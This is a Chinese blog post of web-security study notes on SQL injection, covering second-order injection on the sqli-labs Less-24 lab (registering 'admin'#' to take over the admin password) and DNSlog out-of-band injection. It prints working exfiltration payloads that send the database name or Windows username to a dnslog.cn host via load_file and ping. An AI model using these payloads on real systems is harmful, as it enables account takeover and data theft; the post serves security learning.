day30 SQL注入&CTF&二次&堆叠&DNS带外

最新推荐文章于 2024-01-21 17:03:15 发布
最新推荐文章于 2024-01-21 17:03:15 发布
阅读量710 收藏 2
点赞数
分类专栏: 小迪网安笔记 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hesysd/article/details/127979932
版权

二次注入

  1. 原理

二次注入是存储型注入,可以理解为构造恶意数据存储在数据库后,恶意数据被读取并进入到了SQL查询语句所导致的注入。恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当Web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。详细点来讲,就是在第一次进行数据库插入数据的时候,仅仅只是使用了 addslashes 或者是借助 get_magic_quotes_gpc 对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身还是脏数据。在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次进行需要进行查询的时候,直接从数据库中取出了脏数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。比如在第一次插入数据的时候,数据中带有单引号,直接插入到了数据库中;然后在下一次使用中在拼凑的过程中,就形成了二次注入。二次注入无法通过扫描工具或者代码自己手工测试出来的,二次注入一般会产生在网站程序源代码才会发现的注入漏洞,从前端或者黑盒测试是看不到这个漏洞的。

  1. 过程

第一步:插入恶意数据

第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包含恶意内容。

第二步:引用恶意数据

在将数据存入到了数据库中之后,开发者就认为数据是可信的。在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,这样就会造成SQL的二次注入。

  1. 过程原理图

  1. 思路

a. 黑客通过构造数据的形式,在浏览器或者其他软件中提交HTTP数据报文请求到服务端进行处理,提交的数据报文请求中可能包含了黑客构造的SQL语句或者命令。

b. 服务端应用程序会将黑客提交的数据信息进行存储,通常是保存在数据库中,保存的数据信息的主要作用是为应用程序执行其他功能提供原始输入数据并对客户端请求做出响应。

c. 黑客向服务端发送第二个与第一次不相同的请求数据信息。

d. 服务端接收到黑客提交的第二个请求信息后,为了处理该请求,服务端会查询数据库中已经存储的数据信息并处理,从而导致黑客在第一次请求中构造的SQL语句或者命令在服务端环境中执行。

e. 服务端返回执行的处理结果数据信息,黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功。

2. sqlilabs-less24-post登录框&二次注入

打开网页看到一个登陆界面,输入admin/admin后是修改密码的界面。改密码涉及到对数据库的记录进行替换,我们怀疑此处有一个 UPDATE 语句。

在任何界面进行注入应该都是无效的,因为操作失败时会跳转到其他页面,而没有任何例如错误的回显信息。此处考虑的就不是之前那些把敏感信息弄出来的注入了,而是考虑利用改密码操作夺取其他账号的控制权。此处我们考虑二次注入,首先我们构造一个特殊的用户,该用户的用户名为 “admin'#”,密码随便设

查看数据库,已经添加成功

 使用admin’#进行登录

登录成功后,更改密码为1234

密码更改成功

返回主界面使用账户:admin 密码:1234登录

登陆成功

此时如果将这个用户作为过滤条件实现记录的修改,该用户名后面的 “'#” 不仅能闭合字段,也能把后面的内容注释掉。而且成功闭合后,我们实际上操作的用户名应该是 “admin”。修改密码成功之后,使用用户名 “admin” 和我们修改的密码进行登录,发现我们夺去了该用户的密码,登录成功

网页源码

登录界面

functionsqllogin(){

$username=mysql_real_escape_string($_POST["login_user"]);

$password=mysql_real_escape_string($_POST["login_password"]);

$sql="SELECT * FROM users WHERE username='$username' and password='$password'";

//$sql = "SELECT COUNT(*) FROM users WHERE username='$username' and password='$password'";

$res=mysql_query($sql) ordie('You tried to be real smart, Try harder!!!! :( ');

$row=mysql_fetch_row($res); //print_r($row) ;

if ($row[1])

{

return$row[1];

}

else

{

return0; }

}

DNSlog注入

  1. 原理

首先需要有一个可以配置的域名,比如:ceye.io,然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器 A,然后再服务器 A 上配置好 DNS Server,这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A 上,这时就能够实时地监控域名查询请求了。DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息。简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息

  1. 利用场景

在sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入。

  1. 推荐平台

a. DNSLog Platform

b. CEYE - Monitor service for security testing(需要注册)    

c. http://admin.dnslog.link

2.应用场景:

解决不回显,反向连接,SQL注入,命令执行,SSRF等

SQL注入:

select load_file(concat('\\\\',(select database()),'.7logee.dnslog.cn\\aa'));

and (select load_file(concat('//',(select database()),'.69knl9.dnslog.cn/abc'))) //调用load_file去执行访问dsnlog,把数据外带)

命令执行:

ping %USERNAME%.7logee.dnslog.cn

匿名用户0x3c
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一道二次注入Getshell的CTF题
Lethe's Blog
03-03 4128
这道题是CUMT第二次双月赛的一道web题,在上一篇wp:CUMT第二次双月赛——Web详解中已经详细分析过了,由于我刚入门,觉得在这道题中收获了很多知识,所以想单独放在一篇文章中,方便之后分类查阅。 关于什么是二次注入,可参考:SQL二次注入 下面进入题目: 文件管理系统 1、先扫目录,发现可以下载源码,进行代码审计。 2、查看upload.php代码,发现是如下白名单验证,无法上传绕过。 ...
WEB漏洞攻防 - SQL注入 - 二次注入
易编橙 · 终身成长社群,相遇已是上上签!
08-02 1032
一句话概括 - 逻辑设计上导致的先写入再注入。 应用功能逻辑设计上导致的先写入后组合的注入注入的一种分类,逻辑设计上存在的问题,先写入,再注入!) 可以理解为攻击者构造的恶意数据先存储在数据库,恶意数据被读取并在特定的场景执行SQL查询语句所导致的注入攻击。
CTF--二次注入
qq_53142368的博客
06-07 402
二次注入 昨天的博客没写完,今天补充一下发出去 <!-- Debug Info: Duration: 0.59636402130127 s Current Ip: 10.244.80.46 --> 一看到current IP和last IP,就要知道,应该是把我们的IP写刀数据库里了 这样的话 就是修改X-FORWARD-FOR的值进行注入 先输入1,此时我们的current ip就是它,然后我们再次输入currnt ip是2,但是last IP就是1,因为第一次和第二次的IP不一
小白的CTF之路之二次注入
glass_york的博客
01-08 244
sqlilabs第24关,二次注入
第30天:WEB攻防-通用漏洞&SQL注入&CTF&二次&&DNS
wuqingsix的博客
11-21 387
2、如利用mysql_multi_query()函数就支持多条SQL语句同时执行,实际情况中如PHP的防SQL注入机制,其使用的数据库函数为 "mysqli_query()"函数。主要原因是,堆注入的利用看起来很厉害但是其可能会受到 API、数据库引擎或者权限的控制。1、当用户输入恶意数据时,网站对我们输入的重要的关键字进行了转义,然后存储到数据库。数据一定是插入进去的,数据库攻击代码取出来调用 ,当人有执行查询操作时 会被触发。解决不回显,反向连接,SQL注入,命令执行,SSRF等。
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
CTF Attack & Defense线下攻防赛比赛技巧.pdf
01-15
不错的资源哦!
SQL注入漏洞演示源代码
07-15
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
H&NCTF 2024 Re 全解WP(附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(附件加详细解析)
CTF学习笔记15:iwebsec-SQL注入漏洞-13-二次注入
lifeng_dc的博客
01-23 1705
一、注册用户时单引号被addslashs,不能执行 (一)注册前查看一下用户表 假设目标是获取admin用户的密码 (二)注册admin’#用户 二、找回密码时注入被执行 (一)页面观察准备 为了更好地了解二次注入原理,修改一下reset.php源码,在页面上输出SQL语句 (二)admin用户密码被找回 三、其他二次注入数据 观察初始数据有其他已经注入的数据,我们看下有什么作用 可以看出,这是打二次注入和报错注入结合使用了。 SQL注入小结 自此,用周末1天半的闲暇时间完成了iwebsec
【CTF】二次注入原理及实战
hhhhhhhhh85的博客
11-15 9324
二次注入 文章目录二次注入1、概述2、原理3、注入方法4、CTF实战 1、概述 二次注入是指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。 二次注入sql注入的一种,但是比普通sql注入利用更加困难,利用门槛更高。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询。 2、原理 二次注入的原理,在第一次进行数据库插入数据的时候,使用了 addslashes 、get_magic_quotes_gpc、mysql_e
30、WEB攻防——通用漏洞&SQL注入&CTF&二次&&DNS
qq_55202378的博客
01-21 468
假如在注册用户的时候,需要填用户名、邮箱和密码,登录使用邮箱和密码,登陆上去后会显示用户名,后台为什么知道你的用户名,就可能是使用SQL语句,通过你的邮箱和密码查询到用户名。假如用户名是SQL语句,会在插入的时候就执行SQL语句,然后显示。这就是二次注入的基本原理。应用程序:解决不回显、反向连接(DNS协议一般不被禁用)、SQL注入、命令执行、SSRF等。这个函数),某k真辣鸡,整这么些花里胡哨的。填写表单,保存数据默认会更新所有数据。在mysql中,支持16进制编码。
记录CTF-二次注入
zb0567的专栏
04-20 1818
1、注册 zz\ zz\ 用转义符来断开 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"zz\" and pwd='e11a45fc54767935c57d...
第三十天:WEB攻防-通用漏洞&SQL注入&CTF&二次&&DNS
m0_51322401的博客
02-04 372
SQL注入中的二次注入常见于 注册 新建 等功能点,当我们注册一个新的账号时,需要我们设置我们的 邮箱,用户名,密码。但是当我们成功注册后,登录只需要邮箱与密码即可完成登录,且进入后台用户中心后,我们也可以发现我们的用户名会被显示出来,这就是SQL注入的常见出现流程我们在注册新的账号时,如果使用了 ‘’ “” 等符号 ,会被转义。所以我们常使用的sql注入payload 都会失去效果,但是当该payload被存入数据库在被引出使用的时候是原样输出,不会被过滤转义。这就是二次注入的原理了。
SQL注入&注入&二次注入
weixin_54882883的博客
05-18 370
知识点: 1、数据库堆注入 根据数据库类型决定是否支持多条语句执行 2、数据库二次注入 二次注入:插入后调用显示操作符合 堆注入:判断注入后直接调多条执行 DNS注入:在注入上没太大利用价值,其他还行 堆注入 select * from sy_guestbook where id=1;create table 表名 like 在那个库里创建 select * from sy_guestbook where id=1;create table bbb like sy_guestbook;
SQL注入(二次,DNSlog,堆注入)
qi_SJQ_的博客
11-11 1108
加解密: 最常见的就是base64编码,url编码等等,这些都得熟悉。 比如:cookie处加解密,需要自己去还原并相应地加密payload; 二次注入: 在黑盒测试以及工具中几乎发现不了,拿到源码后代码审计的话才可以发现,因为根本不知到第一次插入什么数据才可以导致二次调用时成功注入。 可以在Less-24实战: 修改密码页面sql源码: UPDATE users SET PASSWORD='$pass' where username='$username' and password='$...
一天一道ctf 第50天(二次注入
scrawman的博客
08-09 334
[CISCN2019 华北赛区 Day1 Web5]CyberPunk 查看源代码,可能有文件包含漏洞,直接读取是不行的,要用filter伪协议:?file=php://filter/convert.base64-encode/resource=index.php同样还可以拿到change.php,delete.php,confirm.php的源码。 代码审计,可以发现对SQL注入的参数进行了很严的过滤,但既然是题目肯定会给你造漏洞,就找那些过滤方法不一样的参数就行了。user_name和phone都用
一天一道ctf 第52天(二次注入
scrawman的博客
08-16 322
[RCTF2015]EasySQL 猜是一道二次注入的题目,但是找不到源码,就注册个admin‘/’'测试一下。登录以后可以看到我们输入的用户名原封不动地回显给我们,点击修改密码会报错。可以看到是双引号闭合,确定是二次注入。 用报错注入看数据库名,要注意or和空格都被过滤用||和()绕过。 admin"||(updatexml(1,concat(0x7e,(select(database())),0x7e),1))# admin"||(updatexml(1,concat(0x7e,(select
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是一道较为简单的SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码漏洞的网页应用题目。参与者需要在登录页面的密码字段中输入特定的注入payload,以绕过身份验证,获取敏感信息或进行其他未授权的操作。 4. web 172(过滤回显内容) 这是一个具有回显内容过滤漏洞的网页应用题目。参与者需要在输入框中构造特定的注入payload,以绕过过滤机制并成功回显注入结果。 这些题目的目的是帮助参与者了解、掌握和应用SQL注入漏洞的原理和技巧,提高其对于Web应用安全的认识和实践能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

匿名用户0x3c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值